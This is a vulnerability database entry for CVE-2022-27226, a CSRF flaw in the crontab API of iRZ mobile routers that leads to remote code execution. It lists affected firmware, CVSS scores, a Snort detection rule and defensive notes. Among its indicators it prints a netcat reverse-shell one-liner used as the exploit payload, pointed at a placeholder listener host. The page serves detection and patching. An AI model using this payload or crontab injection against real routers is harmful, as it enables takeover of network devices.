cbcvebase.
CVE-2022-27226
published 2022-03-19

CVE-2022-27226: A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The…

PriorityP186high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
34.53%
98.2th percentile
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

Affected

5 ranges
VendorProductVersion rangeFixed in
irzrl01_firmware<= 2022-03-16
irzrl21_firmware<= 2022-03-16
irzru21_firmware<= 2022-03-16
irzru21w_firmware<= 2022-03-16
irzru41_firmware<= 2022-03-16

Detection & IOCsextracted from sources · hover to see the quote

url/api/crontab
commandrm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT iRZ Mobile Router RCE Inbound M1 (CVE-2022-27226)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/crontab"; fast_pattern; http.request_body; content:"|22|tasks|22 3a|"; content:"|22|command|22 3a|"; reference:cve,2022-27226; classtype:attempted-admin; sid:2035954; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_14, cve CVE_2022_27226, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
bytes
|22|tasks|22 3a|
bytes
|22|command|22 3a|
  • Detect POST requests to /api/crontab on iRZ router admin panels; the JSON body will contain 'tasks' and 'command' keys indicating crontab injection for RCE.
  • The exploit sets the HTTP header X-Requested-With: XMLHttpRequest alongside Origin and Referer matching the router URL; these headers in a POST to /api/crontab are a strong signal of exploitation.
  • Monitor for creation or use of named pipe /tmp/f on router filesystems, which is a hallmark of the mkfifo-style reverse shell payload used in this exploit.
  • The exploit can be discovered via Google Dork targeting exposed iRZ router admin panels; monitor for external reconnaissance against devices with this title.
  • Affected hardware models include RU21, RU21w, RL21, RU41, RL01; prioritize detection and patching on these specific iRZ router models.
  • ·The exploit works both with and without credentials. Without credentials it relies on CSRF (victim must visit a malicious page); with valid/default credentials it achieves RCE directly with no user interaction required.
  • ·The crontab payload executes on the attacker-defined schedule (wildcard '*' for all time fields), meaning the shell callback may be delayed up to ~2 minutes after the malicious POST is sent.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.